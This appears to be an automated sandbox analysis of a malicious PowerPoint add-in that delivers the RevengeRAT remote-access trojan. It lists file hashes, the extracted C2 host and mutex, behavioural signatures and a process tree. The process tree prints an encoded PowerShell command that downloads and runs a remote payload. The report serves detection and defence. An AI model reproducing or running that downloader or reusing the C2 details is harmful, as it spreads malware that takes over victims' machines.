Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-03-2024 15:01

General

  • Target

    Detalhes da reserva.ppam

  • Size

    18KB

  • MD5

    d9b08507bbed55097f91f61b995f1b81

  • SHA1

    a10b28c1cca42bc277f1569feb830c10a501383e

  • SHA256

    0fabe8bad86d907040ba52fc7fc59e1626a4ea86bb24baa85a94734b4517fddb

  • SHA512

    cf9e1c41fff83c8e851d66ff4baf333b7e12acb99a37c62cf214d06ec5c1ea664e04eb0eb83d8ba206d8ad5a23532d910b48f670678e8238ea70fc9f12ef10b4

  • SSDEEP

    384:dXPuMXrXloiGnEnKdyOeTR05MVzZcqsts7uJNFTRVmWJhCxM:VPX+i0EnKdyOMRWAzZWbTfmoCq

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

craxsrat.ddns.com.br:333

Mutex

27d7e6701f5e

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Detalhes da reserva.ppam" /ou ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcABzADoALwAvAGYAaQByAGUAYgBhAHMAZQBzAHQAbwByAGEAZwBlAC4AZwBvAG8AZwBsAGUAYQBwAGkAcwAuAGMAbwBtAC8AdgAwAC8AYgAvAHQAZQBzAHQAaQBuAGcALQBlAGEAZgAyADgALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AUgBFAFYARQBOAEcARQBSAC4AagBwAGcAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADYAOQBjADAAYgBmADUAOAAtADIAYwBiADAALQA0AGYANwA2AC0AOAA2ADQAOQAtAGEANgA2AGUANQA0AGIANgA2ADkANAAwAA0ACgAnACkAOwAgAA0ACgBYAGUAQgBWAGEAQwB0AEMAVABoAG8AWABHAEcAdwBNAEUAZgBSAHUARAB1AEoAVwBFAFIAYQB0AGEAcABKAGUAZgBPAGYAYwB6AEYAQwBJAFMAbgB5AFQAQwBhAEUASABCAGsARQBNAHUATwBwAHAAQgBGAFYATgBDAEIAQgBLAGEAaQBSAA0ACgA=""
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1592
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Checks processor information in registry
        PID:3936
    • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
      "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3924
      2⤵
      • Process spawned suspicious child process
      • Suspicious use of WriteProcessMemory
      PID:788
      • C:\Windows\system32\dwwin.exe
        C:\Windows\system32\dwwin.exe -x -s 3924
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        PID:3652

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

3
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgydesg1.cwt.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/788-71-0x00007FF965F50000-0x00007FF965F60000-memory.dmp
    Filesize

    64KB

  • memory/788-76-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/788-75-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/788-72-0x00007FF965F50000-0x00007FF965F60000-memory.dmp
    Filesize

    64KB

  • memory/788-73-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/788-40-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/788-70-0x00007FF965F50000-0x00007FF965F60000-memory.dmp
    Filesize

    64KB

  • memory/788-74-0x00007FF965F50000-0x00007FF965F60000-memory.dmp
    Filesize

    64KB

  • memory/788-50-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/788-49-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/788-45-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/788-44-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/788-42-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1592-82-0x0000020922A10000-0x0000020922A28000-memory.dmp
    Filesize

    96KB

  • memory/1592-64-0x00000209229E0000-0x0000020922A02000-memory.dmp
    Filesize

    136KB

  • memory/1592-95-0x00007FF97C890000-0x00007FF97D351000-memory.dmp
    Filesize

    10.8MB

  • memory/1592-91-0x0000020922A30000-0x0000020922A31000-memory.dmp
    Filesize

    4KB

  • memory/1592-90-0x0000020922A10000-0x0000020922A28000-memory.dmp
    Filesize

    96KB

  • memory/1592-88-0x0000020922A10000-0x0000020922A28000-memory.dmp
    Filesize

    96KB

  • memory/1592-86-0x0000020922A10000-0x0000020922A28000-memory.dmp
    Filesize

    96KB

  • memory/1592-84-0x0000020922A10000-0x0000020922A28000-memory.dmp
    Filesize

    96KB

  • memory/1592-80-0x0000020922A10000-0x0000020922A28000-memory.dmp
    Filesize

    96KB

  • memory/1592-79-0x0000020922A10000-0x0000020922A28000-memory.dmp
    Filesize

    96KB

  • memory/1592-78-0x0000020922A10000-0x0000020922A30000-memory.dmp
    Filesize

    128KB

  • memory/1592-77-0x000002093ACD0000-0x000002093ACE0000-memory.dmp
    Filesize

    64KB

  • memory/1592-66-0x000002093ACD0000-0x000002093ACE0000-memory.dmp
    Filesize

    64KB

  • memory/1592-65-0x00007FF97C890000-0x00007FF97D351000-memory.dmp
    Filesize

    10.8MB

  • memory/1968-8-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-12-0x00007FF9638F0000-0x00007FF963900000-memory.dmp
    Filesize

    64KB

  • memory/1968-69-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-7-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-4-0x00007FF965F50000-0x00007FF965F60000-memory.dmp
    Filesize

    64KB

  • memory/1968-6-0x00007FF965F50000-0x00007FF965F60000-memory.dmp
    Filesize

    64KB

  • memory/1968-5-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-3-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-2-0x00007FF965F50000-0x00007FF965F60000-memory.dmp
    Filesize

    64KB

  • memory/1968-1-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-14-0x00007FF9638F0000-0x00007FF963900000-memory.dmp
    Filesize

    64KB

  • memory/1968-10-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-11-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-13-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-0-0x00007FF965F50000-0x00007FF965F60000-memory.dmp
    Filesize

    64KB

  • memory/1968-9-0x00007FF965F50000-0x00007FF965F60000-memory.dmp
    Filesize

    64KB

  • memory/1968-15-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-24-0x0000025635FE0000-0x00000256367E0000-memory.dmp
    Filesize

    8.0MB

  • memory/1968-18-0x0000025637AE0000-0x0000025637CE0000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-17-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/1968-16-0x00007FF9A5ED0000-0x00007FF9A60C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3936-96-0x0000000074EC0000-0x0000000075670000-memory.dmp
    Filesize

    7.7MB

  • memory/3936-97-0x0000000000730000-0x000000000073A000-memory.dmp
    Filesize

    40KB

  • memory/3936-98-0x00000000052E0000-0x0000000005884000-memory.dmp
    Filesize

    5.6MB

  • memory/3936-99-0x0000000004CB0000-0x0000000004CC0000-memory.dmp
    Filesize

    64KB

  • memory/3936-100-0x0000000005150000-0x00000000051EC000-memory.dmp
    Filesize

    624KB

  • memory/3936-101-0x00000000051F0000-0x0000000005256000-memory.dmp
    Filesize

    408KB

  • memory/3936-102-0x0000000074EC0000-0x0000000075670000-memory.dmp
    Filesize

    7.7MB

  • memory/3936-103-0x0000000004CB0000-0x0000000004CC0000-memory.dmp
    Filesize

    64KB